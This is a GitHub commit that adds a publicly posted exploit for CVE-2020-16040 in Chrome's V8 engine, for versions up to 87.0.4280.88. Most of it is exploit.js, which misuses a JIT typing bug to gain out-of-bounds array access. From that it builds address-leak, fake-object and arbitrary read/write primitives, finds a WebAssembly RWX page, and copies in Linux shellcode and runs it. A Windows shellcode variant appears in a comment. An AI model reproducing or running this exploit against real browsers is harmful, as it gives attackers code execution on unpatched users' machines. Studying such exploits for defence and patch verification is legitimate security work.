Skip to content

Commit 79e90d5

Browse files
r4j0x00r4j0x00
committed
Exploit for CVE-2020-16040 
1 parent e07d904 commit 79e90d5

File tree

3 files changed

+100
-0
lines changed

3 files changed

+100
-0
lines changed

CVE-2020-16040/exploit.html

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<script src="exploit.js"></script>

CVE-2020-16040/exploit.js

Lines changed: 98 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,98 @@
1+
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
2+
var wasm_mod = new WebAssembly.Module(wasm_code);
3+
var wasm_instance = new WebAssembly.Instance(wasm_mod);
4+
var f = wasm_instance.exports.main;
5+
6+
var buf = new ArrayBuffer(8);
7+
var f64_buf = new Float64Array(buf);
8+
var u64_buf = new Uint32Array(buf);
9+
let buf2 = new ArrayBuffer(0x150);
10+
11+
function ftoi(val) {
12+
f64_buf[0] = val;
13+
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
14+
}
15+
16+
function itof(val) {
17+
u64_buf[0] = Number(val & 0xffffffffn);
18+
u64_buf[1] = Number(val >> 32n);
19+
return f64_buf[0];
20+
}
21+
22+
function foo(a) {
23+
var y = 0x7fffffff;
24+
25+
if (a == NaN) y = NaN;
26+
if (a) y = -1;
27+
28+
let z = y + 1;
29+
z >>= 31;
30+
z = 0x80000000 - Math.sign(z|1);
31+
32+
if(a) z = 0;
33+
34+
var arr = new Array(0-Math.sign(z));
35+
arr.shift();
36+
var cor = [1.1, 1.2, 1.3];
37+
38+
return [arr, cor];
39+
}
40+
41+
for(var i=0;i<0x3000;++i)
42+
foo(true);
43+
44+
var x = foo(false);
45+
var arr = x[0];
46+
var cor = x[1];
47+
48+
const idx = 6;
49+
arr[idx+10] = 0x4242;
50+
51+
function addrof(k) {
52+
arr[idx+1] = k;
53+
return ftoi(cor[0]) & 0xffffffffn;
54+
}
55+
56+
function fakeobj(k) {
57+
cor[0] = itof(k);
58+
return arr[idx+1];
59+
}
60+
61+
var float_array_map = ftoi(cor[3]);
62+
63+
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
64+
var fake = fakeobj(addrof(arr2) + 0x20n);
65+
66+
function arbread(addr) {
67+
if (addr % 2n == 0) {
68+
addr += 1n;
69+
}
70+
arr2[1] = itof((2n << 32n) + addr - 8n);
71+
return (fake[0]);
72+
}
73+
74+
function arbwrite(addr, val) {
75+
if (addr % 2n == 0) {
76+
addr += 1n;
77+
}
78+
arr2[1] = itof((2n << 32n) + addr - 8n);
79+
fake[0] = itof(BigInt(val));
80+
}
81+
82+
function copy_shellcode(addr, shellcode) {
83+
let dataview = new DataView(buf2);
84+
let buf_addr = addrof(buf2);
85+
let backing_store_addr = buf_addr + 0x14n;
86+
arbwrite(backing_store_addr, addr);
87+
88+
for (let i = 0; i < shellcode.length; i++) {
89+
dataview.setUint32(4*i, shellcode[i], true);
90+
}
91+
}
92+
93+
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
94+
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
95+
var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];
96+
/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode
97+
copy_shellcode(rwx_page_addr, shellcode);
98+
f();

README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -3,3 +3,4 @@
33
[CVE-2021-3156](https://github.com/r4j0x00/exploits/blob/master/CVE-2021-3156/exploit.c): Linux local privilege escalation through heap overflow in sudo ([Demo](https://twitter.com/r4j0x00/status/1355489323794108417))
44
[CVE-2021-3156 One shot exploit](https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156_one_shot)
55
[CVE-2020-6507](https://github.com/r4j0x00/exploits/blob/master/chrome-exploit/exploit.js): Out of bounds write in V8. Chrome versions <= 83.0.4103.97. (RCE)
6+
[CVE-2020-16040](https://github.com/r4j0x00/exploits/blob/master/chrome-exploit/exploit.js): Chrome exploit versions <= 87.0.4280.88

0 commit comments

Comments
 (0)